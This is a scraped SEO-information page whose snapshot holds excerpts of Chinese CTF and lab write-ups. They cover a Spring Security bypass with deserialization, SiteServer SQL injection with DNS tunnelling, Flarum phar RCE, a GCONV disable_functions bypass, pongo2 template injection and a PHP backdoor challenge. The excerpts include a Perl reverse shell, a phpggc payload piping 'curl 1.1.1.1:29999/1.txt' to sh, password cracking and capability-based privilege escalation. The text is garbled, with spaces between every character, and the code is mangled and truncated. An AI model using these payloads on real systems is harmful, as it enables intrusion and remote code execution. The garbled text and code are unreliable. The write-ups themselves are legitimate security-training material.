Lxxx

网站标签

该站未曾设置keywords

---

网站描述

Justanovice

---

上一篇：北京写字楼,办公楼出租租赁价格，北京联合办公，共享办公信息-北京58联合办公网

下一篇：无法访问此网站

seo综合信息

SEO信息	百度来访IP：- | 移动端来访IP：- | 出站链接：0 | 站内链接：0
IP网速：	IP地址：- 地址：- | 网速：838毫秒
ALEXA排名	世界排名：- | 预估IP：- | 预估PV：-
备案信息	- | 名称：- | 已创建：未知

收录	百度	360	搜狗	谷歌
查询	0	0	0	0

电脑关键词	手机关键词	页面友好	首页位置	索引	近期收录
0	0	电脑端优秀	-	0	0

服务器信息 协议类型 HTTP/1.1 200 OK 页面类型 text/html 服务器类型 nginx 程序支持 连接标识 W/"654afeae-8caf" 消息发送 2024年8月11日 9时06分17秒 GZIP检测 已启用GZIP压缩 源文件大小 33.16KB 压缩后大小 13.68KB 压缩率 58.75%

网站快照

L x x x L x x x L x x x L x x x J u s t a n o v i c e 2 0 2 3 浙 江 大 学 生 省 赛 初 赛 s e c O b j L x x x   p u b l i s h e d o n 2 0 2 3 1 1 0 8 题 目 信 息 本 题 涉 及 知 识 点 ： J a v a 代 码 审 计 、 S p r i n g S e c u r i t y 权 限 验 证 绕 过 、 H o t S w a p p a b l e T a r g e t S o u r c e 绕 过 黑 名 单 、 S i g n e d O b j e c t 二 次 反 序 列 化 题 目 类 型 ： C T F 题 目 名 称 ： 2 0 2 3 浙 江 大 学 生 省 赛 初 赛 s e c O b j 题 目 镜 像 ： c c r . c c s . t e n c e n t y u n . c o m / l x x x i n / p u b l i c : z j c t f 2 0 2 3 _ s e c o b j 内 部 端 口 ： 8 0 题 目 附 件 ： 6 Z O + 5 o 6 l O i B o d H R w c z o v L 3 B h b i 5 i Y W l k d S 5 j b 2 0 v c y 8 x T l B B U l h L L W N r W G N T Q U 9 Q V H l y b G x L U T 9 w d 2 Q 9 Z m x h Z y D m j 5 D l j 5 b n o I E 6 I G Z s Y W c = （ 自 行 B a s e 6 4 解 码 ） 启 动 脚 本 请 确 保 本 地 安 装 了 d o c k e r 命 令 ， 并 且 确 保 1 2 3 4 5 端 口 未 被 占 用 ， 然 后 以 r o o t 权 限 运 行 下 方 命 令 ， 运 行 成 功 后 会 返 回 一 串 1 6 进 制 字 符 串 （ 此 为 容 器 I D ） ， 表 示 容 器 运 行 成 功 ， 接 着 打 开 C h r o m e 或 者 F i r e f o x 浏 览 器 ， 用 浏 览 器 访 问 1 2 3 4 5 端 口 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 e F L A G = f l a g c c r . c c s . t e n c e n t y u n . c o m / l x x x i n / p u b l i c : z j c t f 2 0 2 3 _ s e c o b j W r i t e U p S p r i n g S e c u r i t y 权 限 绕 过 分 析 题 目 给 了 附 件 ， 反 编 译 打 开 ， 整 体 的 目 录 结 构 如 下 ： 用 了 S p r i n g S e c u r i t y 做 权 限 验 证 存 在 A d m i n C o n t r o l l e r 和 I n d e x C o n t r o l l e r 自 定 义 了 一 个 O b j e c t I n p u t S t r e a m 先 看 p o m 依 赖 ， p o m 依 赖 挺 正 常 的 ， 没 有 非 常 特 殊 的 依 赖 ： 再 看 A d m i n C o n t r o l l e r ， 很 明 显 存 在 一 个 反 序 列 化 入 口 反 序 列 化 入 口 在 / a d m i n 路 由 下 ， 由 于 这 里 用 了 S p r i n g S e c u r i t y 做 权 限 验 证 ， 所 以 需 要 尝 试 绕 过 权 限 验 证 观 察 S e c u r i t y C o n f i g 类 ： 第 一 个 c o n f i g u r e 做 了 访 问 控 制 第 二 个 c o n f i g u r e 设 置 了 a d m i n 的 密 码 ， 不 过 a d m i n 的 密 码 是 u u i d 随 机 生 成 的 这 里 的 访 问 控 制 链 如 下 ： 1 ( ( H t t p S e c u r i t y ) ( ( F o r m L o g i n C o n f i g u r e r ) ( ( H t t p S e c u r i t y ) ( ( E x p r e s s i o n U r l A u t h o r i z a t i o n C o n f i g u r e r . A u t h o r i z e d U r l ) ( ( E x p r e s s i o n U r l A u t h o r i z a t i o n C o n f i g u r e r . A u t h o r i z e d U r l ) h t t p . a u t h o r i z e R e q u e s t s ( ) . a n t M a t c h e r s ( n e w S t r i n g [ ] ) ) . h a s R o l e ( A D M I N ) . a n y R e q u e s t ( ) ) . p e r m i t A l l ( ) . a n d ( ) ) . f o r m L o g i n ( ) . d e f a u l t S u c c e s s U r l ( / a d m i n / u s e r / h e l l o ) ) . a n d ( ) ) . l o g o u t ( ) . l o g o u t S u c c e s s U r l ( / l o g i n ) ; 由 于 反 编 译 存 在 类 型 转 换 ， 原 本 链 式 的 访 问 控 制 被 编 译 的 很 难 看 ， 这 里 稍 作 美 化 处 理 ： 本 意 是 想 让 拥 有 A D M I N 角 色 的 人 能 访 问 / a d m i n / * 下 的 资 源 默 认 登 录 成 功 的 路 由 为 / a d m i n / u s e r / h e l l o 登 出 后 跳 转 到 / l o g i n 1 2 3 4 5 6 h t t p . a u t h o r i z e R e q u e s t s ( ) . a n t M a t c h e r s ( n e w S t r i n g [ ] ) . h a s R o l e ( A D M I N ) . a n y R e q u e s t ( ) . p e r m i t A l l ( ) . a n d ( ) . f o r m L o g i n ( ) . d e f a u l t S u c c e s s U r l ( / a d m i n / u s e r / h e l l o ) ) . a n d ( ) . l o g o u t ( ) . l o g o u t S u c c e s s U r l ( / l o g i n ) ; 这 里 其 实 就 存 在 绕 过 ： / a d m i n / * 实 际 上 只 匹 配 一 层 资 源 ， 例 如 ： 能 匹 配 到 / a d m i n / a ， 能 匹 配 到 / a d m i n / a . j s ， 但 不 能 匹 配 到 / a d m i n / a / b 如 果 想 要 匹 配 / a d m i n / a / b ， 就 需 要 写 成 / a d m i n / * * 的 形 式 这 里 反 序 列 化 入 口 位 于 / a d m i n / u s e r / r e a d O b j ， 但 用 了 / a d m i n / * 来 匹 配 ， 显 然 是 匹 配 不 到 的 这 里 的 绕 过 和 S p r i n g S e c u r i t y 无 关 ， 这 种 匹 配 模 式 就 是 这 么 设 计 的 ， 如 果 在 生 产 环 境 中 遇 到 ， 就 是 开 发 者 的 问 题 所 以 ， 在 不 添 加 任 何 参 数 、 不 携 带 任 何 S E S S I O N 的 情 况 下 ， 是 可 以 直 接 访 问 到 / a d m i n / u s e r / h e l l o 的 那 么 问 题 来 了 ， 为 什 么 在 直 接 P O S T 去 访 问 / a d m i n / u s e r / r e a d O b j 却 不 行 了 呢 ？ 需 要 注 意 的 是 ， 这 里 返 回 的 是 4 0 3 F o r b i d d e n ， 并 不 是 4 0 1 U n a u t h o r i z e d ， 所 以 权 限 判 断 实 际 上 是 已 经 过 了 ， 返 回 4 0 3 的 原 因 实 际 上 是 S p r i n g S e c u r i t y 默 认 会 开 启 c s r f 验 证 ， 防 止 c s r f 攻 击 ， 实 际 上 在 开 发 的 时 候 ， 很 多 培 训 视 频 会 上 来 就 把 S p r i n g S e c u r i t y 的 c s r f 验 证 关 掉 （ 如 下 方 代 码 所 示 ） ： R e a d M o r e 春 秋 云 镜 T u n n e l X L x x x   p u b l i s h e d o n 2 0 2 3 1 0 3 1 外 网 信 息 搜 集 打 S i t e S e r v e r v 1 6 . 5 数 据 库 外 网 信 息 搜 集 ： 8 0 端 口 有 个 S i t e S e r v e r C M S 版 本 为 v 1 6 . 5 2 1 2 1 端 口 有 个 允 许 匿 名 登 录 的 F T P 服 务 ， 该 F T P 服 务 下 有 个 s e c r e t . 7 z 下 载 s e c r e t . 7 z （ 这 里 M a c 下 载 不 下 来 ， 用 L i n u x 的 f t p 可 以 下 载 ） 1 2 3 4 f t p 3 9 . 9 9 . 2 3 8 . 6 9 2 1 2 1 a n o n y m o u s d i r g e t s e c r e t . 7 z 下 载 下 来 之 后 ， s e c r e t . 7 z 打 开 需 要 密 码 ， 先 将 其 转 换 为 j o h n 格 式 ， 然 后 再 用 j o h n 去 爆 破 密 码 （ 这 里 完 整 跑 完 j o h n 需 要 4 8 个 小 时 ， 但 密 码 的 位 置 比 较 靠 前 ， 大 约 1 分 钟 左 右 就 能 跑 出 来 了 ） 密 码 为 1 3 1 3 1 3 1 3 ， 注 意 要 用 7 z 命 令 去 解 压 ， M a c 解 压 输 入 密 码 会 失 败 1 2 3 7 z 2 j o h n s e c r e t . 7 z > 1 . t x t j o h n 1 . t x t w o r d l i s t = / u s r / s h a r e / w o r d l i s t s / r o c k y o u . t x t 7 z x s e c r e t . 7 z 解 压 之 后 有 一 个 s e c r e t . t x t ， 给 个 一 个 u u i d ， 这 是 S i t e S e r v e r C M S 的 A P I 密 钥 1 7 z x s e c r e t . 7 z 8 0 端 口 有 S i t e S e r v e r v 1 6 . 5 服 务 ， 该 版 本 后 台 存 在 S Q L 注 入 ： h t t p s : / / g i t h u b . c o m / s i t e s e r v e r / c m s / i s s u e s / 3 2 3 7 S i t e S e r v e r C M S 提 供 了 使 用 H e a d e r 的 A P I 认 证 方 式 代 替 账 号 密 码 登 录 ， 因 此 ， 我 们 拥 有 了 A P I 之 后 ， 可 以 直 接 调 用 后 台 的 接 口 进 而 造 成 S Q L 注 入 h t t p s : / / s s c m s . c o m / d o c s / v 6 / a p i / g u i d e / a u t h e n t i c a t i o n . h t m l # % E 4 % B D % B F % E 7 % 9 4 % A 8 a p i % E 5 % A F % 8 6 % E 9 % 9 2 % A 5 % E 8 % B F % 9 B % E 8 % A 1 % 8 C % E 8 % B A % A B % E 4 % B B % B D % E 8 % A E % A 4 % E 8 % A F % 8 1 精 简 的 后 台 S Q L 注 入 请 求 包 如 下 ， 后 面 的 内 容 都 从 这 个 数 据 包 展 开 ： 1 2 3 4 5 6 7 P O S T / a p i / p a g e s / c m s / l i b r a r y T e x t / l i s t H T T P / 1 . 1 H o s t : 3 9 . 9 9 . 2 3 8 . 2 0 9 X S S A P I K E Y : e 7 d 4 1 8 9 0 5 7 4 2 4 8 f 0 9 f 3 c 1 3 9 3 d b 5 4 1 f c 7 C o n t e n t T y p e : a p p l i c a t i o n / j s o n C o n t e n t L e n g t h : 1 2 7 利 用 D N S 隧 道 反 弹 s h e l l 和 代 理 经 过 测 试 ， 这 里 W e b 服 务 和 M y S Q L 数 据 库 是 分 开 的 ， 并 且 M y S Q L 数 据 库 的 T C P 是 不 出 网 的 ， 但 D N S 出 网 （ 可 以 用 c u r l 外 带 部 分 命 令 结 果 ） ， 所 以 我 们 需 要 搭 建 D N S 隧 道 （ 而 不 是 T C P 隧 道 ） 此 时 我 们 只 能 执 行 S Q L 语 句 ， 如 果 想 要 执 行 命 令 ， 可 以 采 用 加 载 u d f . s o 的 方 式 执 行 命 令 ， 由 于 加 载 u d f . s o 的 数 据 包 比 较 大 ， 这 里 就 不 在 文 中 贴 出 来 了 ， 脚 本 已 经 放 在 了 G i t h u b 上 ： R e a d M o r e 春 秋 云 镜 F l a r u m L x x x   p u b l i s h e d o n 2 0 2 3 0 8 1 5 外 网 F l a r u m “ 弱 ” 口 令 后 台 P h a r 打 点 开 局 一 个 登 录 框 ， 卡 了 3 小 时 根 据 主 页 提 示 ， 用 户 名 为 a d m i n i s t r a t o r ， 邮 箱 为 a d m i n i s t r a t o r @ x i a o r a n g . l a b 这 里 直 接 给 出 密 码 ， 用 r o c k y o u . t x t 跑 密 码 a d m i n i s t r a t o r 、 1 c h r i s 进 入 后 台 ， 这 里 外 网 用 的 是 F l a r u m 框 架 ， 这 个 框 架 去 年 P 牛 发 过 文 章 ， 是 一 个 后 台 R C E 的 洞 ： h t t p s : / / m p . w e i x i n . q q . c o m / s / E q E y E D K p z x S 5 B Y A _ t 7 4 p 9 A 功 能 点 在 编 辑 C S S 处 原 理 简 单 来 说 是 利 用 l e s s . p h p 编 译 L e s s ， 在 编 译 的 过 程 中 ， 利 用 @ i m p o r t ( i n l i n e ) 和 d a t a 伪 协 议 将 文 件 写 入 到 a s s e t s / f o r u m . c s s 中 ， 再 用 d a t a u r i ( p h a r : / / . / a s s e t s / f o r u m . c s s ) 触 发 p h a r 反 序 列 化 实 现 命 令 执 行 这 里 的 反 序 列 化 链 由 p h p g g c 生 成 ： 这 里 反 弹 s h e l l 需 要 一 点 小 技 巧 ， 我 这 里 的 打 法 是 ： 在 2 9 9 9 9 端 口 的 H T T P 服 务 里 放 一 个 1 . t x t ， 然 后 在 3 9 9 9 9 端 口 监 听 准 备 拿 s h e l l 1 p e r l e u s e S o c k e t ; $ i = 1 . 1 . 1 . 1 ; $ p = 3 9 9 9 9 ; s o c k e t ( S , P F _ I N E T , S O C K _ S T R E A M , g e t p r o t o b y n a m e ( t c p ) ) ; i f ( c o n n e c t ( S , s o c k a d d r _ i n ( $ p , i n e t _ a t o n ( $ i ) ) ) ) ; 再 用 p h p g g c 生 成 1 p h p p h p g g c p t a r b M o n o l o g / R C E 6 s y s t e m c u r l 1 . 1 . 1 . 1 : 2 9 9 9 9 / 1 . t x t | s h p a y l o a d 如 下 ： 1 @ i m p o r t ( i n l i n e ) d a t a : t e x t / c s s ; b a s e 6 4 , d G V z d C 5 0 e H Q A A A A A A A . . . . . . ; 访 问 一 下 ， p h a r 内 容 成 功 写 入 然 后 再 编 辑 一 下 ， 用 d a t a u r i 做 p h a r 反 序 列 化 触 发 命 令 执 行 1 2 3 . t e s t 拿 s h e l l 接 下 来 就 是 提 权 部 分 ， 这 题 没 法 用 s u i d 提 权 ， 用 c a p a b i l i t i e s 提 权 ， 查 找 设 置 了 c a p a b i l i t i e s 可 执 行 文 件 1 g e t c a p r / 2 > / d e v / n u l l 发 现 o p e n s s l 可 以 利 用 ： 用 o p e n s s l 生 成 证 书 启 动 w e b 服 务 监 听 在 8 0 8 0 端 口 1 2 o p e n s s l r e q x 5 0 9 n e w k e y r s a : 2 0 4 8 k e y o u t / t m p / k e y . p e m o u t / t m p / c e r t . p e m d a y s 3 6 5 n o d e s o p e n s s l s _ s e r v e r k e y / t m p / k e y . R e a d M o r e 2 0 2 3 N e p C T F E z _ i n c l u d e L x x x   p u b l i s h e d o n 2 0 2 3 0 8 1 5 本 题 不 会 做 镜 像 ， 太 绕 了 ， 各 种 知 识 点 杂 糅 在 一 起 ， 期 待 N e p 公 开 镜 像 （ 题 目 信 息 题 目 名 称 ： 2 0 2 3 N e p C T F E z _ i n c l u d e 题 目 描 述 ： A p a c h e 2 每 五 分 钟 自 动 重 启 ， 不 会 影 响 做 题 过 程 部 署 题 目 需 要 一 段 时 间 ， 请 师 傅 们 耐 心 等 待 （ 若 超 过 1 0 分 钟 仍 然 无 法 访 问 ， 请 销 毁 容 器 再 重 新 开 启 ） 可 以 参 考 ： h t t p s : / / t t t a n g . c o m / a r c h i v e / 1 3 9 5 / W r i t e U p 本 题 参 考 了 其 他 师 傅 的 解 ， 目 前 在 绕 过 d i s a b l e _ f u n c t i o n s 部 分 看 到 两 种 打 法 ， 分 别 是 利 用 G C O N V 和 L D _ P R E L O A D 环 境 变 量 绕 d i s a b l e _ f u n c t i o n s 本 题 大 概 思 路 如 下 ： 利 用 P H P 的 f i l t e r 伪 协 议 完 成 L F I 到 R C E 利 用 D O M D o c u m e n t 原 生 类 写 入 文 件 绕 过 d i s a b l e _ f u n c t i o n s 环 境 变 量 提 权 拿 f l a g G C O N V 首 先 打 开 题 目 ， 点 击 主 页 的 按 钮 ， 有 个 l i n k 参 数 ， 比 较 明 显 存 在 文 件 包 含 这 里 后 端 做 了 个 拼 接 ， 传 入 / t m p / r e s o u r c e s / 4 会 变 成 / t m p / r e s o u r c e s / 4 . t x t 用 p h p _ f i l t e r _ c h a i n _ g e n e r a t o r 生 成 一 段 L F I 2 R C E 的 神 秘 字 符 串 （ 具 体 原 理 这 里 不 阐 述 ， 简 单 来 说 就 是 利 用 B a s e 6 4 和 U T F 8 转 U T F 7 特 性 拼 凑 出 一 段 w e b s h e l l ， 进 而 包 含 w e b s h e l l 实 现 命 令 执 行 ） h t t p s : / / g i t h u b . c o m / s y n a c k t i v / p h p _ f i l t e r _ c h a i n _ g e n e r a t o r 1 p y t h o n 3 p h p _ f i l t e r _ c h a i n _ g e n e r a t o r . p y c h a i n 接 着 将 上 方 生 成 的 字 符 串 传 给 l i n k 参 数 ， 一 句 话 木 马 的 密 码 为 1 ， 执 行 命 令 即 可 ， 注 意 这 里 有 d i s a b l e _ f u n c t i o n s ， 所 以 先 执 行 p h p i n f o 查 看 d i s a b l e _ f u n c t i o n s 和 d i s a b l e _ c l a s s e s 有 哪 些 d i s a b l e _ f u n c t i o n s 和 d i s a b l e _ c l a s s e s 内 容 分 别 如 下 1 2 f p a s s t h r u , f g e t s s , f g e t s , f o p e n , f r e a d , s h o w _ s o u c e , s t r e a m _ s o c k e t _ c l i e n t , f s o c k o p e n , p c n t l _ a l a r m , p c n t l _ f o r k , p c n t l _ w a i t p i d , p c n t l _ w a i t , p c n t l _ w i f e x i t e d , p c n t l _ w i f s t o p p e d , p c n t l _ w i f s i g n a l e d , p c n t l _ w i f c o n t i n u e d , p c n t l _ w e x i t s t a t u s , p c n t l _ w t e r m s i g , p c n t l _ w s t o p s i g , p c n t l _ s i g n a l , p c n t l _ s i g n a l _ g e t _ h a n d l e r , p c n t l _ s i g n a l _ d i s p a t c h , p c n t l _ g e t _ l a s t _ e r r o r , p c n t l _ s t r e r r o r , p c n t l _ s i g p r o c m a s k , p c n t l _ s i g w a i t i n f o , p c n t l _ s i g t i m e d w a i t , p c n t l _ e x e c , p c n t l _ g e t p r i o r i t y , p c n t l _ s e t p r i o r i t y , p c n t l _ a s y n c _ s i g n a l s , s y s t e m , e x e c , s h e l l _ e x e c , p o p e n , p r o c _ o p e n , p a s s t h r u , s y m l i n k , l i n k , s y s l o g , i m a p _ o p e n , d l , m a i l , e r r o r _ l o g , d e b u g _ b a c k t r a c e , d e b u g _ p r i n t _ b a c k t r a c e , g c _ c o l l e c t _ c y c l e s , a r r a y _ m e r g e _ r e c u r s i v e , p f s o c k o p e n , r e a d f i l e , f i l e _ g e t _ c o n t e n t s , f i l e _ p u t _ c o n t e n t s , f p u t s , f w r i t e , d e l e t e , r m d i r , r e n a m e , c h g r p , c h m o d , c h o w n , c o p y , c h d i r , m k d i r , f i l e , c h r o o t , a s s e r t , d l , m o v e _ u p l o a d _ f i l e , s y s m l i n k , r e a d l i n k , c u r l _ i n i t , c u r l _ e x e c E x c e p t i o n , S p l D o u b l y L i n k e d L i s t , E r r o r , E r r o r E x c e p t i o n , A r g u m e n t C o u n t E r r o r , A r i t h m e t i c E r r o r , A s s e r t i o n E r r o r , D i v i s i o n B y Z e r o E r r o r , C o m p i l e E r r o r , P a r s e E r r o r , T y p e E r r o r , V a l u e E r r o r , U n h a n d l e d M a t c h E r r o r , C l o s e d G e n e r a t o r E x c e p t i o n , L o g i c E x c e p t i o n , B a d F u n c t i o n C a l l E x c e p t i o n , B a d M e t h o d C a l l E x c e p t i o n , D o m a i n E x c e p t i o n , I n v a l i d A r g u m e n t E x c e p t i o n , L e n g t h E x c e p t i o n , O u t O f R a n g e E x c e p t i o n , P h a r E x c e p t i o n , R e f l e c t i o n E x c e p t i o n , R u n t i m e E x c e p t i o n , O u t O f B o u n d s E x c e p t i o n , O v e r f l o w E x c e p t i o n , P D O E x c e p t i o n , R a n g e E x c e p t i o n , U n d e r f l o w E x c e p t i o n , U n e x p e c t e d V a l u e E x c e p t i o n , J s o n E x c e p t i o n , S p l F i l e O b j e c t , S o d i u m E x c e p t i o n 同 理 ， 还 发 现 了 题 目 环 境 设 置 了 o p e n _ b a s e d i r 这 部 分 蚁 剑 是 可 以 正 常 连 接 的 这 里 面 有 一 个 h i n t . i n i ， 是 p h p . i n i 配 置 ， 其 中 / t m p 目 录 在 蚁 剑 是 可 以 访 问 的 ， 直 接 在 红 色 方 框 处 输 入 路 径 读 取 即 可 接 下 来 就 是 绕 过 d i s a b l e _ f u n c t i o n s ， 这 里 用 G C O N V 绕 过 d i s a b l e _ f u n c t i o n s ， 完 整 打 法 如 下 ： 为 了 后 面 的 数 据 包 简 便 ， 这 里 先 利 用 前 面 的 马 子 写 W e b s h e l l 到 / t m p / t e s t . t x t ， 由 于 f i l e _ p u t _ c o n t e n t s 等 函 数 都 被 过 滤 了 ， 这 里 利 用 D O M D o c u m e n t 原 生 类 写 文 件 （ 注 意 U R L 编 码 ） 1 2 3 4 1 = $ f = / t m p / t e s t . t x t ; $ d = n e w D O M D o c u m e n t ( ) ; $ d l o a d H T M L ( P D 9 w a H A g a W 5 p X 3 N l d C g n Z G l z c G x h e V 9 l c n J v c n M n L C d P b i c p O 2 V 2 Y W w o J F 9 Q T 1 N U W z F d K T s % 2 F P g % 3 D % 3 D ) ; $ d s a v e H t m l F i l e ( p h p : / / f i l t e r / s t r i n g . s t r i p _ t a g s | c o n v e r t . b a s e 6 4 d e c o d e / r e s o u r c e = $ f ) ; 写 完 之 后 ， 可 以 在 蚁 剑 看 看 文 件 大 小 是 否 正 确 再 写 一 个 p a y l o a d . c ， 在 本 地 将 其 编 译 成 恶 意 动 态 链 接 库 ， 该 恶 意 动 态 链 接 库 会 执 行 1 . s h 文 件 内 容 （ 这 种 打 法 比 较 稳 定 ， 我 本 地 在 g c o n v _ i n i t ( ) 中 直 接 弹 s h e l l 是 可 以 的 ， 题 目 远 程 不 行 ， 估 计 是 环 境 限 制 的 比 较 多 ） 1 2 3 4 5 6 7 8 9 1 0 # i n c l u d e # i n c l u d e v o i d g c o n v ( ) v o i d g c o n v _ i n i t ( ) l x x x i n / c i s c n 2 0 2 3 _ d e s e r b u g W r i t e U p 这 题 考 察 c c 链 的 改 造 ， 先 下 载 附 件 分 析 ： T e s t a p p 类 中 直 接 对 传 入 的 b u g s t r 参 数 b a s e 6 4 解 码 并 反 序 列 化 ， 并 且 还 会 调 用 t o S t r i n g ( ) 方 法 题 目 用 的 是 C C 3 . 2 . 2 依 赖 ， 在 C C 3 . 2 . 2 及 以 后 ， 对 一 些 不 安 全 的 J a v a 类 的 序 列 化 增 加 了 开 关 ， 默 认 为 关 闭 状 态 ， 比 如 C C 6 要 用 到 的 I n v o k e r T r a n s f o r m e r 类 就 被 干 掉 了 不 过 题 目 给 了 一 个 M y e x c e p t 类 ， 注 意 g e t A n y e x c e p t 方 法 可 以 实 例 化 一 个 单 参 数 的 类 这 一 段 实 例 化 T r A X F i l t e r 类 ： 因 此 s i n k 点 就 是 T e m p l a t e s I m p l 类 再 拼 接 一 下 中 间 的 g a d g e t ， 题 目 给 了 下 方 的 提 示 ： 1 c n . h u t o o l . j s o n . J S O N O b j e c t . p u t c o m . a p p . M y e x p e c t # g e t A n y e x c e p t 那 接 下 来 就 是 要 找 调 用 p u t 的 地 方 ， 其 中 L a z y M a p # g e t 方 法 可 以 调 用 p u t 再 就 是 找 调 用 g e t 的 地 方 ， 要 求 调 用 g e t 的 只 有 一 个 参 数 ， 并 且 是 M a p 类 的 实 现 类 使 用 T a b b y 寻 找 的 语 法 如 下 （ F r o m a t a o ） ： m a t c h ( s o u r c e : M e t h o d ) w h e r e s o u r c e . C L A S S N A M E = ~ o r g . a p a c h e . c o m m o n s . c o l l e c t i o n s . * m a t c h ( s i n k : M e t h o d ) w h e r e s i n k . P A R A M E T E R _ S I Z E = 1 w i t h s o u r c e , c o l l e c t ( s i n k ) a s s i n k s c a l l t a b b y . a l g o . f i n d J a v a G a d g e t ( s o u r c e , s i n k s , 3 , f a l s e , t r u e ) y i e l d p a t h r e t u r n p a t h 最 终 找 到 的 类 是 T i e d M a p E n t r y 堆 栈 信 息 如 下 ： 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 e x e c : 3 4 7 , R u n t i m e ( j a v a . R e a d M o r e 2 0 2 3 C I S C N 初 赛 g o s e s s i o n L x x x   p u b l i s h e d o n 2 0 2 3 0 8 1 3 镜 像 信 息 题 目 名 称 ： 2 0 2 3 C I S C N 初 赛 g o s e s s i o n d o c k e r 镜 像 ： l x x x i n / c i s c n 2 0 2 3 _ g o s e s s i o n f l a g 信 息 ： 根 目 录 下 内 部 端 口 ： 8 0 注 意 ： 部 署 时 ， 容 器 至 少 需 要 2 5 6 M B 的 运 行 内 存 ， 否 则 容 器 将 无 法 启 动 题 目 描 述 ： c t f e r 按 照 官 方 文 档 的 模 板 编 写 了 代 码 ， 但 是 好 像 哪 里 出 了 问 题 。 容 器 启 动 可 能 需 要 一 两 分 钟 ， 请 耐 心 等 待 ！ 附 件 ： g o _ s e s s i o n _ 4 c 9 1 a f 7 9 7 8 0 f c 7 0 a 4 d 2 1 b 2 7 2 b a 3 a 3 7 1 c . z i p 启 动 脚 本 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 e F L A G = f l a g l x x x i n / c i s c n 2 0 2 3 _ g o s e s s i o n W r i t e U p 下 载 附 件 ， 放 到 G o l a n d 中 分 析 ， 题 目 一 共 三 个 路 由 ： I n d e x A d m i n F l a s k 先 看 I n d e x 路 由 ， I n d e x 路 由 内 容 很 简 单 ， 直 接 赋 了 个 s e s s i o n ， s e s s i o n 中 的 n a m e 值 为 g u e s t ， 这 里 发 现 s e s s i o n 的 k e y 是 通 过 S E S S I O N _ K E Y 环 境 变 量 获 取 的 再 看 A d m i n 路 由 ： 这 里 对 s e s s i o n 做 了 验 证 ， 需 要 n a m e 为 a d m i n 这 里 用 p o n g o 2 做 模 板 渲 染 ， 存 在 模 板 渲 染 漏 洞 接 着 看 F l a s k 路 由 ： F l a s k 路 由 会 请 求 靶 机 里 5 0 0 0 端 口 服 务 ， 并 把 请 求 页 面 回 显 经 过 测 试 ， 得 到 以 下 结 论 ： 5 0 0 0 端 口 为 p y t h o n 的 f l a s k 服 务 ， 开 启 了 d e b u g 模 式 ， 源 码 不 存 在 s s t i 漏 洞 s e s s i o n 默 认 k e y 为 空 ， 可 以 直 接 伪 造 a d m i n 用 户 f l a s k 源 码 可 以 通 过 让 f l a s k 报 错 获 取 ： 1 / f l a s k ? n a m e = / 源 码 如 下 ： 本 题 正 确 思 路 如 下 ： 由 于 s e s s i o n 默 认 k e y 为 空 ， 伪 造 a d m i n 用 户 后 可 以 调 用 A d m i n 路 由 A d m i n 路 由 中 存 在 p o n g o 2 模 板 注 入 漏 洞 ， p o n g o 2 模 板 语 法 可 以 参 考 D j a n g o 模 板 语 法 通 过 D j a n g o 模 板 注 入 覆 盖 / a p p / s e r v e r . p y 文 件 ， 由 于 p y t h o n 服 务 是 可 以 “ 热 部 署 ” 的 ， 因 此 覆 盖 恶 意 文 件 后 ， 再 通 过 F l a s k 路 由 调 用 即 可 R C E 再 说 一 下 错 误 思 路 ： 错 误 思 路 是 利 用 p o n g o 2 模 板 语 法 读 取 算 P I N 所 需 的 文 件 ， 计 算 出 P I N 后 通 过 F l a s k 路 由 请 求 / c o n s o l e 实 现 R C E ， 但 是 想 在 / c o n s o l e 中 执 行 命 令 仅 通 过 G E T 传 参 是 无 法 完 成 验 证 的 ， 并 且 后 续 执 行 代 码 请 求 都 需 要 携 带 C o o k i e 验 证 ， 所 以 这 条 路 走 不 通 首 先 获 取 一 下 a d m i n 用 户 的 s e s s i o n ： 把 下 方 代 码 加 到 r o u t e 里 ， 访 问 即 可 拿 到 伪 造 后 的 s e s s i o n 1 2 3 4 5 6 f u n c K e y ( c * g i n . C o n t e x t ) l x x x i n / s c t f 2 0 2 3 _ f u m o b a c k d o o r W r i t e U p 下 载 附 件 ， 审 计 源 码 ， 题 目 是 不 出 网 的 题 目 开 了 i m a g i c k 扩 展 ， / v a r / w w w / h t m l 目 录 不 可 写 再 审 计 源 代 码 ， 一 共 有 三 个 功 能 点 ： 反 序 列 化 删 除 / t m p 目 录 下 的 所 有 内 容 （ 这 算 是 题 目 的 提 示 了 ） 高 亮 当 前 文 件 再 看 题 目 给 的 后 门 类 ： 其 实 这 里 s i n k 点 有 两 个 ， 一 个 是 r e a d f i l e 读 取 文 件 ， 另 一 个 是 n e w $ a ( $ b ) 格 式 的 代 码 对 于 n e w $ a ( $ b ) 格 式 的 代 码 ， 如 果 题 目 出 网 并 且 w e b 目 录 可 写 的 话 ， 是 可 以 直 接 R C E 的 ， 但 是 本 题 既 不 出 网 ， w e b 目 录 又 不 可 写 因 此 题 目 的 s i n k 点 就 在 r e a d f i l e 了 ， 那 么 如 何 触 发 _ _ s l e e p ( ) 魔 术 方 法 呢 ， _ _ s l e e p 魔 术 方 法 会 在 序 列 化 的 时 候 被 调 用 所 以 整 个 攻 击 流 程 如 下 ： 首 先 把 / t m p 目 录 清 空 ： 1 2 G E T / ? c m d = r m H T T P / 1 . 1 H o s t : 1 . 1 . 1 . 1 : 4 9 3 3 8 再 制 作 一 个 P P M 图 片 ， 选 择 P P M 的 原 因 是 P P M 末 尾 允 许 添 加 一 些 脏 数 据 ， 并 且 该 脏 数 据 也 不 会 被 i m a g i c k 抹 去 s e s s i o n 的 内 容 生 成 方 式 如 下 ： 这 里 我 们 设 置 p a t h 属 性 为 / t m p / r e s 路 径 ， 这 个 路 径 就 是 / f l a g 复 制 之 后 的 路 径 重 点 看 1 6 行 ， 这 里 的 脏 数 据 的 数 量 其 实 是 有 一 定 要 求 的 ， 在 第 1 2 行 设 置 了 P P M 图 片 的 长 和 宽 ， 即 9 * 9 像 素 ， 这 里 的 脏 数 据 + 序 列 化 数 据 的 数 量 需 要 大 于 等 于 3 * 9 * 9 且 小 于 等 于 4 * 9 * 9 （ 这 里 3 和 4 可 以 简 单 理 解 为 每 个 像 素 所 占 用 的 字 节 ） ， 具 体 原 理 不 深 究 了 ， 这 里 就 当 做 记 个 结 论 （ 如 果 有 其 他 想 法 ， 可 以 随 时 私 信 讨 论 ） 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 R e a d M o r e 2 0 2 3 S C T F p y p y p L x x x   p u b l i s h e d o n 2 0 2 3 0 8 1 3 题 目 信 息 题 目 名 称 ： 2 0 2 